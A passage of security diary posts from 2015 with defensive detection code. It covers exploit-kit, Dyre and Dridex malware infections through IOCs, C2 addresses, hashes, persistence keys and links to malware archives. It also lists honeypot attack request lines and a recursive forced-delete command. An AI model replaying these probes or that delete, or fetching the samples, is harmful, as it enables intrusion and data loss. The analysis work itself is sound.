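'timestamp UTC - DNS query for: name - server response: answer' notation;
the two lines that received an address (example.com, example.net) are constructed."""
import re
from datetime import datetime, timedelta

LINE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC - DNS query for: (\S+) - server response: (.+)$")
VOWELS = set("aeiou")

def parse(lines):
    """Return [(timestamp, fqdn, response), ...], skipping lines in other formats."""
    events = []
    for line in lines:
        m = LINE.match(line.strip().lstrip("- "))
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group(2).lower().rstrip("."), m.group(3).strip()))
    return events

def looks_random(label):
    """Heuristic used only to annotate a burst: a long, all-letter label with few
    vowels (tihvekkgxvjjstk). It misses some names (aywqalevruhie), which is why
    the burst count, not this test, drives the alert."""
    if len(label) < 10 or not label.isalpha():
        return False
    return sum(c in VOWELS for c in label) / len(label) < 0.35

def nxdomain_bursts(events, window=timedelta(seconds=30), threshold=4):
    """Group NXDOMAIN answers into non-overlapping windows, each starting at the
    first miss not yet assigned; return those holding at least 'threshold' misses."""
    misses = sorted((ts, name) for ts, name, resp in events
                    if resp.lower().startswith("no such name"))
    bursts, i = [], 0
    while i < len(misses):
        start = misses[i][0]
        j = i
        while j < len(misses) and misses[j][0] - start <= window:
            j += 1
        names = [name for _, name in misses[i:j]]
        if len(names) >= threshold:
            bursts.append({"start": start.strftime("%H:%M:%S"), "count": len(names),
                           "random_looking": sum(looks_random(n.split(".")[0]) for n in names),
                           "names": names})
        i = j
    return bursts

def summarize(lines):
    return nxdomain_bursts(parse(lines))

SAMPLE_LINES = [
    "- 2015-05-20 17:03:30 UTC - DNS query for: www.example.com - server response: 192.0.2.10",  # constructed
    "- 2015-05-20 17:03:37 UTC - DNS query for: tihvekkgxvjjstk.com - server response: No such name",
    "- 2015-05-20 17:03:37 UTC - DNS query for: aywqalevruhie.com - server response: No such name",
    "- 2015-05-20 17:03:37 UTC - DNS query for: jdwkjeyumdxbc.com - server response: No such name",
    "- 2015-05-20 17:03:37 UTC - DNS query for: nsktpgiexicpnt.com - server response: No such name",
    "- 2015-05-20 17:03:38 UTC - DNS query for: npkxghmoru.biz - server response: No such name",
    "- 2015-05-20 17:04:37 UTC - DNS query for: llncjudabb.com - server response: No such name",
    "- 2015-05-20 17:04:37 UTC - DNS query for: veqtdpofgjwe.com - server response: No such name",
    "- 2015-05-20 17:04:37 UTC - DNS query for: acsgneqxcsoyvmc.com - server response: No such name",
    "- 2015-05-20 17:04:37 UTC - DNS query for: lbvruinysrbpyjr.com - server response: No such name",
    "- 2015-05-20 17:04:37 UTC - DNS query for: npkxghmoru.biz - server response: No such name",
    "- 2015-05-20 17:04:40 UTC - DNS query for: www.example.net - server response: 192.0.2.20",  # constructed
]

if __name__ == "__main__":
    for b in summarize(SAMPLE_LINES):
        print("%s: %d NXDOMAIN, %d random-looking: %s" % (b["start"], b["count"], b["random_looking"], ", ".join(b["names"])))
```

A 30-second window separates the two bursts seen here; widening it to 60 seconds merges them into one, so the window should be tuned to the sampling interval of the malware family being hunted rather than fixed globally.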
UDP packets sent from the infected host:
- 2015-05-20 17:03:42 UTC - 192.168.122.202 port 18672 - 95.87.49.120 port 13099
- 2015-05-20 17:03:47 UTC - 192.168.122.202 port 18672 - 87.69.21.149 port 17931 (return traffic noted)
- 2015-05-20 17:03:52 UTC - 192.168.122.202 port 18672 - 85.86.36.76 port 9535
- 2015-05-20 17:04:23 UTC - 192.168.122.202 port 18672 - 123.193.182.220 port 11772
- 2015-05-20 17:04:33 UTC - 192.168.122.202 port 18672 - 82.210.187.14 port 7309
- 2015-05-20 17:04:38 UTC - 192.168.122.202 port 18672 - 158.109.235.80 port 8202
- 2015-05-20 17:04:43 UTC - 192.168.122.202 port 18672 - 93.123.40.76 port 26871
- 2015-05-20 17:05:48 UTC - 192.168.122.202 port 18672 - 46.35.207.228 port 5844
- 2015-05-20 17:09:48 UTC - 192.168.122.202 port 18672 - 128.131.102.41 port 15037
- 2015-05-20 17:10:48 UTC - 192.168.122.202 port 18672 - 79.116.151.17 port 10223
- 2015-05-20 17:11:48 UTC - 192.168.122.202 port 18672 - 109.245.156.224 port 17975
- 2015-05-20 17:12:48 UTC - 192.168.122.202 port 18672 - 186.22.5.205 port 28181
- 2015-05-20 17:13:48 UTC - 192.168.122.202 port 18672 - 197.129.0.92 port 19877
- 2015-05-20 17:15:48 UTC - 192.168.122.202 port 18672 - 150.217.108.178 port 31812
- 2015-05-20 17:17:48 UTC - 192.168.122.202 port 18672 - 109.54.13.232 port 5483
- 2015-05-20 17:19:48 UTC - 192.168.122.202 port 18672 - 2.193.233.219 port 13321
TCP SYN packets sent by the infected host, with no response from the server:
- 2015-05-20 17:04:28 UTC - 192.168.122.202 port 49158 - 141.20.242.66 port 12592
- 2015-05-20 17:06:48 UTC - 192.168.122.202 port 49161 - 199.241.229.89 port 16140
- 2015-05-20 17:08:48 UTC - 192.168.122.202 port 49162 - 190.219.222.57 port 12381
- 2015-05-20 17:14:48 UTC - 192.168.122.202 port 49163 - 49.205.160.135 port 23582
- 2015-05-20 17:16:48 UTC - 192.168.122.202 port 49164 - 79.2.157.254 port 8189
- 2015-05-20 17:18:48 UTC - 192.168.122.202 port 49165 - 77.81.9.120 port 18949
Images from the traffic

Shown above: Link to the gate found in page from the compromised website

Shown above: The gate redirecting traffic to the Nuclear exploit kit landing page

Shown above: Nuclear exploit kit landing page

Shown above: Nuclear exploit kit sends a Flash exploit

Shown above: Nuclear exploit kit sends the malware payload

Shown above: HTTP traffic caused by the malware
Preliminary malware analysis
Malware payload delivered by the Nuclear exploit kit (Necurs)
- File name: C:\Users\username\AppData\Local\Temp\385E.tmp
- File size: 116.0 KB ( 118784 bytes )
- MD5 hash: 41a867c465464efa23b2451ae1367396
- Detection ratio: 7 / 57
- First submitted: 2015-05-20 19:25:00 UTC
- https://www.virustotal.com/en/file/6c362198a8879579c074ee8b0b14e712e059ff7f6037305e26f6d9ed47c6d39b/analysis/
Additional malware found on the infected host (Necurs-related):
- File name: C:\Windows\Temp\UUD95CB.tmp
- File name: C:\Windows\System32\drivers\c4e6d8d66af44d3.sys
- File size: 72.9 KB ( 74688 bytes )
- MD5 hash: b4c59dcef92878abb17c79c7d340851d
- Detection ratio: 4 / 57
- First submitted: 2015-05-20 19:26:34 UTC
- https://www.virustotal.com/en/file/58ec4db50fdaea8b8c078348c555737c9113374800c9b7d9cb9f0a2b8865f527/analysis/
Some of the registry keys for persistence:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_C4E6D8D66AF44D3\000\Control
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\c4e6d8d66af44d3
- NOTE: The same keys were also found in ControlSet001 and ControlSet002
Final words
A pcap of the infection traffic is available at:
A zip file of the associated malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
---
Brad Duncan
ISC Handler and Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://www.symantec.com/security_response/writeup.jsp?docid=2012-121212-2802-99
[2] https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Necurs
[3] http://malware-traffic-analysis.net/2015/05/14/index3.html
[4] http://malware-traffic-analysis.net/2015/05/15/index.html
Logjam - vulnerabilities in Diffie-Hellman key exchange affect browsers and servers using TLS
There's a new vulnerability in town... "The new bug, dubbed LogJam, is a cousin of Freak. But it’s in the basic design of TLS itself, meaning all Web browsers, and some email servers, are vulnerable." [1] According to the article, "Internet-security experts crafted a fix for a previously undisclosed bug in security tools used by all modern Web browsers. But deploying the fix could break the Internet for thousands of websites."
Logjam attack can allow an attacker "to significantly weaken the encrypted connection between a user and a Web or email server..." [2]
From: https://weakdh.org/
Diffie-Hellman key exchange is a popular cryptographic algorithm that allows Internet protocols to agree on a shared key and negotiate a secure connection. It is fundamental to many protocols including HTTPS, SSH, IPsec, SMTPS, and protocols that rely on TLS.
We have uncovered several weaknesses in how Diffie-Hellman key exchange has been deployed...
We're starting to see news coverage from other outlets, and we're sure more analysis will emerge. However, at this time your best source for more information on this bug is at weakdh.org.
For now, ensure you have the most recent version of your browser installed, and check for updates frequently. If you’re a system administrator, please review the Guide to Deploying Diffie-Hellman for TLS at https://weakdh.org/sysadmin.html
--
Brad Duncan
ISC Handler and Security Researcher at Rackspace
References:
[1] http://www.wsj.com/articles/new-computer-bug-exposes-broad-security-flaws-1432076565
[2] http://www.pcworld.com/article/2924532/new-encryption-flaw-logjam-puts-web-surfers-at-risk.html
Upatre/Dyre malspam - Subject: eFax message from "unknown"
Introduction
Yesterday on 2015-05-19, I attended a meeting from my local chapter of the Information Systems Security Association (ISSA). During the meeting, one of the speakers discussed different levels of incident response by Security Operations Center (SOC) personnel. For non-targeted issues like botnet-based malicious spam (malspam) infecting a Windows host, you probably won't waste valuable time investigating every little detail. In most cases, you'll probably start the process to re-image the infected computer and move on. Other suspicious events await, and they might reveal a more serious, targeted threat.
However, we still recover information about these malspam campaigns. Traffic patterns evolve, and changes should be documented.
Today's example of malspam
Searching through my employer's blocked spam filters, I found the following Upatre/Dyre wave of malspam:
- Date/Time: 2015-05-19 from 12:00 AM to 5:47 AM CST
- Number of messages: 20
- Sender (spoofed): [email protected]
- Subject: eFax message from "unknown" - [random number] page(s)
- Attachment: Fax_ewew_43434.zip
As shown in the above image, these messages were tailored for the recipients. You'll also notice some of the recipient email addresses contain random characters and numbers. Nothing new here. It's just one of the many waves of malspam our filters block every day. I reported a similar wave earlier this month [1]. Let's look at the malware.
The attachment is a typical example of Upatre, much like we've seen before. Let's see what this malware does in a controlled environment.
Indicators of compromise (IOC)
I ran the malware on a physical host and generated the following traffic:
- 2015-05-19 15:16:12 UTC - 166.78.246.145 port 80 - icanhazip.com - GET /
- 2015-05-19 15:16:13 UTC - 91.211.17.201 port 13410 - SYN packet to server, no response
- 2015-05-19 15:16:16 UTC - 80.233.179.250 port 443 - two SYN packets to server, no response
- 2015-05-19 15:16:58 UTC - 85.67.42.40 port 443 - two SYN packets to server, no response
- 2015-05-19 15:17:40 UTC - 188.127.129.48 port 443 - SSL traffic - approx 510 KB sent from server to infected host
- 2015-05-19 15:17:56 UTC - 217.10.68.152 port 3478 - UDP STUN traffic to: stun.sipgate.net
- 2015-05-19 15:17:58 UTC - 62.122.69.132 port 443 - SSL traffic - approx 256 KB sent from server to infected host
- 2015-05-19 15:18:40 UTC - 91.211.17.201 port 13409 - SYN packet to server, no response
In my last post about Upatre/Dyre, we saw Upatre-style HTTP GET requests to 91.211.17.201 but no HTTP response from the server [1]. That's been the case for quite some time now. However, in this example, the infected host attempted a TCP connection to 91.211.17.201, but the connection was reset after the initial SYN packet, and an HTTP GET request was never sent.

Shown above: An example of Upatre-style HTTP GET requests from my previous ISC Diary on Upatre/Dyre

Shown above: Attempted TCP connections to the same IP address now reset (RST) by the server
How can we tell this is Upatre? The malware checks for an IP address, and header lines in the associated HTTP GET request fit the pattern for Upatre.
As I've mentioned before, icanhazip.com is a service run by one of my fellow Rackspace employees [2]. By itself, it's not malicious. Unfortunately, malware authors use this and similar services to check an infected computer's IP address.
What alerts trigger on this traffic? See the image below for Emerging Threats-based Snort events on the infection traffic using Security Onion.
Related files on the infected host include:
- C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe (Dyre)
- C:\Users\username\AppData\Local\ne9bzef6m8.dll
- C:\Users\username\AppData\Local\Temp\~TP95D5.tmp (encrypted or otherwise obfuscated)
- C:\Users\username\AppData\Local\Temp\Jinhoteb.exe (where Upatre copied itself after it was run)
Some Windows registry changes for persistence:
- Key name: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
- Key name: HKEY_USERS\S-1-5-21-52162474-342682794-3533990878-1000\Software\Microsoft\Windows\CurrentVersion\Run
- Value name: GoogleUpdate
- Value type: REG_SZ
- Value data: C:\Users\username\AppData\Local\PwTwUwWTWcqBhWG.exe
A pcap of the infection traffic is available at:
A zip file of the associated Upatre/Dyre malware is available at:
The zip file is password-protected with the standard password. If you don't know it, email [email protected] and ask.
Final words
This was yet another wave of Upatre/Dyre malspam. No real surprises, but it's always interesting to note the small changes from these campaigns.
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] https://isc.sans.edu/diary/UpatreDyre+the+daily+grind+of+botnetbased+malspam/19657
[2] https://major.io/icanhazip-com-faq
False Positive? settings-win.data.microsoft.com resolving to Microsoft Blackhole IP
Thanks to Xavier for bringing this to our attention. It looks like a couple of days ago a legitimate Microsoft host name, settings-win.data.microsoft.com, started to resolve to a Microsoft IP that is commonly used for blackholes that Microsoft operates:
$ host settings-win.data.microsoft.com
settings-win.data.microsoft.com is an alias for settings.data.glbdns2.microsoft.com.
settings.data.glbdns2.microsoft.com is an alias for blackhole6.glbdns2.microsoft.com.
blackhole6.glbdns2.microsoft.com has address 131.253.18.253
Connecting to a blackhole IP like this is often an indicator of compromise, and many IDSs will flag it. For example:
[**] [1:2016101:2] ET TROJAN DNS Reply Sinkhole - Microsoft - 131.253.18.0/24 [**] [Classification: A Network Trojan was detected] [Priority: 1] ...
It is not yet clear what process causes the connection to this IP on port 443. But a number of other users are reporting similar issues. For example, see here:
https://social.technet.microsoft.com/Forums/windowsserver/en-US/37aecee6-0df9-4234-8159-c632070478ad/strange-dns-requests-blocked-by-ips?forum=winserversecurity
At this point, I am assuming that this is some kind of configuration error at Microsoft.
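The Snort signature quoted above fires on the DNS reply; the same check can be run on demand against host output before deciding whether an alert is a compromise or, as here, a legitimate name parked on a sinkhole. The following is an added example, not the diary's code: it follows the CNAME chain in host output to the final owner name and tests its addresses against the sinkhole range named in that signature (131.253.18.0/24). HOST_OUTPUT is the diary's own host output; BENIGN_OUTPUT is a constructed chain that resolves into documentation address space.

```python
"""Follow the CNAME chain in 'host' output and test whether the final address
falls in a known sinkhole range, which is the check the ET Snort signature
quoted above applies to DNS replies. Added example, not the diary's code. The
only sinkhole range listed is the one named in that signature (131.253.18.0/24);
HOST_OUTPUT is the diary's 'host' output, BENIGN_OUTPUT a constructed chain
that resolves into documentation space (192.0.2.0/24)."""
import ipaddress
import re

SINKHOLES = {"Microsoft sinkhole (ET sid 2016101)": ipaddress.ip_network("131.253.18.0/24")}
ALIAS = re.compile(r"^(\S+) is an alias for (\S+)$")
ADDR = re.compile(r"^(\S+) has (?:IPv6 )?address (\S+)$")

def parse_host_output(text):
    """Return ({alias: target}, {name: [ip, ...]}) from 'host' output lines."""
    cnames, addrs = {}, {}
    for line in text.strip().splitlines():
        line = line.strip()
        m = ALIAS.match(line)
        if m:
            cnames[m.group(1).rstrip(".")] = m.group(2).rstrip(".")
            continue
        m = ADDR.match(line)
        if m:
            addrs.setdefault(m.group(1).rstrip("."), []).append(ipaddress.ip_address(m.group(2)))
    return cnames, addrs

def resolve_chain(name, cnames, addrs, max_hops=8):
    """Walk CNAMEs from 'name' (bounded, in case of a loop) to the final owner
    name; return the chain and that name's addresses."""
    chain = [name]
    while name in cnames and len(chain) <= max_hops:
        name = cnames[name]
        chain.append(name)
    return chain, addrs.get(name, [])

def sinkhole_check(name, host_output):
    """Chain, resolved addresses, and any (address, sinkhole label) matches."""
    cnames, addrs = parse_host_output(host_output)
    chain, ips = resolve_chain(name, cnames, addrs)
    hits = [(str(ip), label) for ip in ips for label, net in SINKHOLES.items() if ip in net]
    return {"chain": chain, "addresses": [str(ip) for ip in ips], "sinkhole": hits}

# The diary's 'host' output for the affected name.
HOST_OUTPUT = """
settings-win.data.microsoft.com is an alias for settings.data.glbdns2.microsoft.com.
settings.data.glbdns2.microsoft.com is an alias for blackhole6.glbdns2.microsoft.com.
blackhole6.glbdns2.microsoft.com has address 131.253.18.253
"""
# Constructed: a chain that ends in ordinary address space.
BENIGN_OUTPUT = """
www.example.com is an alias for cdn.example.net.
cdn.example.net has address 192.0.2.44
"""

if __name__ == "__main__":
    print(sinkhole_check("settings-win.data.microsoft.com", HOST_OUTPUT))
    print(sinkhole_check("www.example.com", BENIGN_OUTPUT))
```

Keeping the whole chain in the result matters for triage: a sinkhole hit reached through a vendor's own glbdns2 names, as here, points at a vendor-side DNS change, while a hit reached directly from an unfamiliar name points at the host.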
IoT roundup: Apple Watch Patches, Router Vulnerabilities
Yes, there is a security patch for the Apple Watch now. It fixes 13 different vulnerabilities. At least one of the vulnerabilities (CVE-2015-1093) can be used to execute arbitrary code. But not all of the vulnerabilities are "cutting edge". We also got an ICMP redirect issue (CVE-2015-1103) and of course SSL issues that are addressed by disabling old ciphers (FREAK vulnerability) and updating the list of trusted CAs.
The Internet of Things certainly does get a lot of attention this year, and I think rightfully so. I consider web gateways/routers a prime example, and just to make that point, here are the top 10 attacks against our web application honeypot:
  25700  GET / HTTP/1.1\r\n
  10596  GET http
   9059  GET /cgi-bin/authLogin.cgi HTTP/1.1\n  <- QNAP shellshock issue
   6771  GET /phpMyAdmin/scripts/setup.php HTTP/1.1\r\n
   6638  GET /pma/scripts/setup.php HTTP/1.1\r\n
   6511  GET /myadmin/scripts/setup.php HTTP/1.1\r\n
   4297  GET /manager/html HTTP/1.1\r\n
   3939  GET /manager/html/ HTTP/1.1\r\n
   3672  GET /tmUnblock.cgi HTTP/1.1\r\n <- Linksys Routers (see "Moon Worm")
   2820  GET /pony/includes/templates/error.tpl HTTP/1.1\r\n
Two of our top ten URLs exclusively attack devices. So better make sure you are patched as well as it gets, and try to avoid exposing the admin interface to the public.
Address spoofing vulnerability in Safari Web Browser
A new vulnerability has surfaced in the Safari web browser that can lead to address spoofing, allowing attackers to show any URL address while loading a different web page. While this proof of concept is not perfect, it could definitely be refined for use in phishing attacks very easily.
There is a proof of concept at http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari web browser:

From same iPad using Google Chrome:

The code is very simple: the web page reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page, so the user sees the "real" web address instead of the fake one:

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.
Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web: http://manuel.santander.name
e-mail: msantand at isc dot sans dot org
VENOM - Does it live up to the hype?
-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)
Another Maldoc? I'm Afraid So...
Guess what? Yep, there's yet another type of malicious document going around. Like last time, it's a MIME file with an MSO file containing an OLE file.

The sample (schro_193B11.xls 7F8C5E8B7157B04FA8E9CEEF13C28AB9) is an Excel spreadsheet saved as a MIME file:

But this time, the compressed data is at another position inside the MSO file:

So I updated my oledump tool (V0.0.16) to search for compressed data inside MSO files (instead of looking at the fixed position 50).
The string encoding used in the VBA code is interesting. It is reminiscent of RC4:

I also updated my plugin plugin_dridex with this encoding:

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com
Oh Bloat!
I recently installed a new printer. Windows didn't seem to know its driver, so I "had" to supply the CD-ROM that came with the printer. Of course, being a device driver, it asked for admin privileges to install. I went for custom install instead of full, but that option failed and crashed in EMET with a buffer overflow. Not a good omen. But since I wanted to print, I de-selected "custom" and went for "recommended". Yes, I'm naive at times. Apparently, all it takes to "p0wn" me is to ship me a printer together with a CD. [blush].
20 minutes later, I was the proud owner of FOUR pieces of software that have NOTHING to do with printing. What the [beep]! And to add insult to injury, TWO of the four pieces didn't show up in Add-Remove-Programs, and hence could not be "easily" evicted again. The most annoying piece was "isuspm", Acresso Software Manager. Completely getting rid of the four pieces of bloatware required use of Sysinternals "Autoruns", plus generous "del /s /q /f *" at the prompt, plus six! reboots. Yes, I probably could have reverted to a snapshot, but I kinda wanted to keep the printer driver itself.
Hello, dear printer vendors: Charge me 15$ more for the printer, if you must, but stop wasting my time un-installing all that [beeping] [beep]!
If you are in a similar situation, ignore whatever comes with the printer (especially the CD!), go to the web site of the printer manufacturer, and search for the device driver for the model at hand. Somewhat to my surprise, they offered an "expert" install that came without all the crud, and just included the driver. Now .. why can't this minimal installation also be on the CD? Why screw all the poor home users [and naive ISC handlers :)] for no good reason except to make five measly dollars on the side??
Recent Dridex activity
Introduction
Botnet-based Dridex malspam is like the Energizer Bunny. It just won't quit. We see it almost every day.
Since last year, botnet hosts pushing Dridex have been using macros in Microsoft Word documents or Excel spreadsheets to deliver the malware [1]. These files are most often attachments in malicious spam (malspam).
Dridex traffic has evolved somewhat since I last blogged about it [2]. For this diary, we'll look at a wave from Tuesday, 2015-05-12 as described on the Dynamoo Blog [3]. I saw a few of these messages while reviewing emails blocked by my employer's spam filters. Let's take a closer look...
Email Example
Nothing really ground-breaking here. In this wave, hosts associated with Dridex malspam used the recipient as part of the name for the malicious attachment, but we've seen this before.
Traffic Generated by the Malware
I infected a host by running the Excel spreadsheet and enabling macros. Reviewing the traffic with Security Onion revealed several info and policy events. It also alerted on a likely Dridex certificate in the SSL traffic.
A pcap of the traffic is available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-traffic.pcap
Below is a list of HTTP GET requests and other indicators of compromise (IOCs) noted in the pcap file:
- 141.101.112.16 port 80 - pastebin.com - GET /download.php?i=5K5YLjVu
- 92.63.88.87 port 8080 - 92.63.88.87:8080 - GET /bt/get.php
- 5.9.44.37 port 80 - savepic.org - GET /7257790.jpg
- 14.98.183.4 port 443 - TLS traffic
- 31.24.30.65 port 443 - TLS traffic
- 46.36.217.227 port 3443 - TLS traffic
- 75.145.133.5 port 443 - TLS traffic
- 82.112.185.104 port 8000 - TLS traffic
- 87.117.229.29 port 443 - TLS traffic
- 144.76.109.82 port 443 - TLS traffic
- 45.55.154.235 port 80 - encrypted traffic
- 79.149.254.3 port 80 - encrypted traffic / TLS traffic
- 27.60.164.164 port 443 - SYN packet only (no response)
- 65.51.130.39 port 443 - SYN packet only (no response)
- 82.17.98.133 port 443 - SYN packet only (no response)
- 89.228.50.77 port 1443 - SYN packet only (no response)
- 95.163.121.215 port 80 - SYN packet only (no response)
- 131.111.216.180 port 443 - SYN packet only (no response)
Screenshots from the Traffic
After enabling macros for the malicious Excel spreadsheet, the host called for a Visual Basic Script (VBS) file from pastebin:
The VBS file generated an HTTP GET request to download a Windows executable file (the Dridex malware):
Shortly after that, a small JPG image was downloaded by the infected host:
Dridex activity included SSL traffic to various IP addresses, mostly with example.com SSL certificates. I also noted an SSL certificate for example.net as shown below:
SSL traffic happened on various TCP ports, including port 80:
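TLS on a port other than 443 (port 80, 8000 and 3443 in the IOC list above) is one of the cheaper things to alert on. As an added example, not code from the diary or from Security Onion, the following Python checks the first client bytes of each flow for a TLS handshake record carrying a ClientHello and reports those flows whose destination port is not in the expected set. The flow dictionaries, the 203.0.113.x addresses and the minimal ClientHello record bytes are constructed for this example.

```python
import struct

# TLS record header: content type (1 byte), version major/minor (2 bytes), length (2 bytes).
# 0x16 = Handshake; the first handshake message type byte 0x01 = ClientHello.
TLS_HANDSHAKE = 0x16
HS_CLIENT_HELLO = 0x01


def looks_like_tls_client_hello(payload):
    """Return (True, 'major.minor') if payload starts with a TLS handshake record whose
    first message is a ClientHello, else (False, None). Only the record and handshake
    headers are parsed; this is a classifier, not a full TLS parser."""
    if len(payload) < 6:
        return False, None
    content_type, major, minor, _rec_len = struct.unpack("!BBBH", payload[:5])
    if content_type != TLS_HANDSHAKE or major != 3 or minor > 4:
        return False, None
    if payload[5] != HS_CLIENT_HELLO:
        return False, None
    return True, "%d.%d" % (major, minor)


def find_tls_on_unexpected_ports(flows, expected_ports=(443,)):
    """flows: iterable of dicts with keys src, dst, dport, payload (first client bytes).
    Returns [(dst, dport, version)] for ClientHellos sent to ports outside expected_ports."""
    hits = []
    for f in flows:
        is_hello, version = looks_like_tls_client_hello(f["payload"])
        if is_hello and f["dport"] not in expected_ports:
            hits.append((f["dst"], f["dport"], version))
    return hits


# Constructed sample: a TLS 1.2 handshake record (0x16 0x03 0x03, length 0x2f) whose body
# starts with handshake type 0x01, followed by filler bytes standing in for the ClientHello body.
CLIENT_HELLO = bytes.fromhex("160303002f0100002b0303") + b"\x00" * 32

SAMPLE_FLOWS = [  # constructed flows, not taken from the pcap
    {"src": "10.0.0.5", "dst": "203.0.113.10", "dport": 443, "payload": CLIENT_HELLO},
    {"src": "10.0.0.5", "dst": "203.0.113.20", "dport": 80, "payload": CLIENT_HELLO},
    {"src": "10.0.0.5", "dst": "203.0.113.30", "dport": 3443, "payload": CLIENT_HELLO},
    {"src": "10.0.0.5", "dst": "203.0.113.40", "dport": 80,
     "payload": b"GET /7257790.jpg HTTP/1.1\r\nHost: savepic.org\r\n\r\n"},
]

if __name__ == "__main__":
    for dst, port, ver in find_tls_on_unexpected_ports(SAMPLE_FLOWS):
        print("TLS %s ClientHello to %s:%d (unexpected port)" % (ver, dst, port))
```

The expected-port set is a policy knob: an environment that legitimately runs TLS on 8443 adds it, and what remains is exactly the "SSL on port 80" behaviour the diary notes.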
Malware
People have submitted the Windows executable to various public sites for malware analysis:
- https://www.virustotal.com/en/file/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8/analysis/
- https://malwr.com/analysis/ZmQzM2E1ZThmOWZhNDQzM2FkNzM1NGE3YTlkODU1ZjM/
- https://www.hybrid-analysis.com/sample/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8?environmentId=1
- https://www.hybrid-analysis.com/sample/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8?environmentId=2
- https://www.hybrid-analysis.com/sample/da0d74b7f5311b41225a925270a00a41c639b0fec3f8ec3008b4f08afe805df8?environmentId=4
A zip archive of the malware is also available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-malware.zip
The zip file is password-protected with the standard password. If you don't know it, email me at [email protected] and ask.
Final Notes
The last time I looked into Dridex traffic, I saw a lot of post-infection HTTP GET requests over port 80. In this example, the post-infection traffic was mainly SSL or otherwise encrypted. Can't wait to see what Dridex has in store for us next!
---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic
References:
[1] http://researchcenter.paloaltonetworks.com/2015/01/dridex-banking-trojan-begins-2015-bang/
[2] http://www.malware-traffic-analysis.net/2015/04/15/index.html
[3] http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html
May 2015 Microsoft Patch Tuesday Summary
Overview of the May 2015 Microsoft patches and their status.
| # | Affected | CVE | KB | Known Exploits | Microsoft rating(**) | ISC rating(*) clients | ISC rating(*) servers |
|---|---|---|---|---|---|---|---|
| MS15-043 | Cumulative Security Update for Internet Explorer (Replaces MS15-032) | CVE-2015-1658, CVE-2015-1684, CVE-2015-1685, CVE-2015-1686, CVE-2015-1688, CVE-2015-1689, CVE-2015-1691, CVE-2015-1692, CVE-2015-1694, CVE-2015-1703, CVE-2015-1704, CVE-2015-1705, CVE-2015-1706, CVE-2015-1708, CVE-2015-1709, CVE-2015-1710, CVE-2015-1711, CVE-2015-1712, CVE-2015-1713, CVE-2015-1714, CVE-2015-1717, CVE-2015-1718 | KB 3049563 | . | Severity: Critical, Exploitability: 1 | Critical | Critical |
| MS15-044 | Vulnerabilities in Microsoft Font Drivers Could Allow Remote Code Execution (Replaces MS13-034, MS13-082, MS15-023) | CVE-2015-1670, CVE-2015-1671 | KB 3057110 | . | Severity: Critical, Exploitability: 1 | Critical | Critical |
| MS15-045 | Vulnerability in Windows Journal Could Allow Remote Code Execution (Replaces MS14-038) | CVE-2015-1675, CVE-2015-1695, CVE-2015-1696, CVE-2015-1697, CVE-2015-1698, CVE-2015-1699 | KB 3046002 | . | Severity: Critical, Exploitability: 2 | Critical | Critical |
| MS15-046 | Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (Replaces MS13-085, MS15-012, MS15-022, MS15-033) | CVE-2015-1682, CVE-2015-1683 | KB 3057181 | . | Severity: Important, Exploitability: 1 | Critical | Important |
| MS15-047 | Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution (Replaces MS12-066, MS15-022) | CVE-2015-1700 | KB 3058083 | . | Severity: Important, Exploitability: 2 | Important | Critical |
| MS15-048 | Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (Replaces MS12-038, MS13-015, MS13-040, MS13-082, MS14-009) | CVE-2015-1672, CVE-2015-1673 | KB 3057134 | . | Severity: Important, Exploitability: 3 | Important | Important |
| MS15-049 | Vulnerability in Silverlight Could Allow Elevation of Privilege (Replaces MS14-014) | CVE-2015-1715 | KB 3058985 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-050 | Vulnerability in Service Control Manager Could Allow Elevation of Privilege | CVE-2015-1702 | KB 3055642 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-051 | Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (Replaces MS15-023) | CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, CVE-2015-1679, CVE-2015-1680, CVE-2015-1701 | KB 3057191 | vuln. public. | Severity: Important, Exploitability: 0 | Important | Important |
| MS15-052 | Vulnerability in Windows Kernel Could Allow Security Feature Bypass (Replaces MS15-010) | CVE-2015-1674 | KB 3050514 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-053 | Vulnerabilities in JScript and VBScript Scripting Engines Could Allow Security Feature Bypass (Replaces MS11-031, MS12-056) | CVE-2015-1684, CVE-2015-1686 | KB 3057263 | . | Severity: Important, Exploitability: 2 | Important | Important |
| MS15-054 | Vulnerability in Microsoft Management Console File Format Could Allow Denial of Service | CVE-2015-1681 | KB 3051768 | . | Severity: Important, Exploitability: 2 | Important | Important |
